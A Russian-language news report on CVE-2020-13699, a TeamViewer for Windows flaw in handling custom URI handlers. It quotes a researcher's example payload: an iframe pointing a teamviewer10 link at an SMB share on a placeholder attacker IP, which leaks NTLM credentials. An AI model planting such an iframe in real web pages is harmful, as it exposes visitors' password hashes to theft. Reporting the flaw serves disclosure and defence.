Опасная уязвимость в TeamViewer для Windows может привести к взлому паролей пользователей и, как следствие, к компрометации всей операционной системы. Получившую идентификатор CVE-2020-13699 брешь можно использовать удалённо.
Специалисты советуют особо присмотреться к этой проблеме безопасности, поскольку с приходом COVID-19 TeamViewer для удалённого доступа стали использовать гораздо чаще.
CVE-2020-13699 представляет собой путь поиска или элемент без кавычек. Другими словами, приложение некорректно обрабатывает кастомные URI-хендлеры. Это может привести к эксплуатации в момент посещения вредоносного сайта.
«Атакующий может встроить вредоносный iframe в веб-сайт со специальным URL — iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'. Именно эта ссылка запустит десктопный Windows-клиент TeamViewer и заставит его открыть удалённую SMB-шару», — объяснил Джеффри Хофманн, специалист в области кибербезопасности из компании Praetorian.
«Windows при этом осуществит NTLM-аутентификацию и этот запрос злоумышленник может использовать для выполнения кода».
Для успешной атаки киберпреступнику не обязательно проходить процесс аутентификации. Тем не менее в настоящее время нет информации об эксплуатации этой уязвимости в реальных атаках.
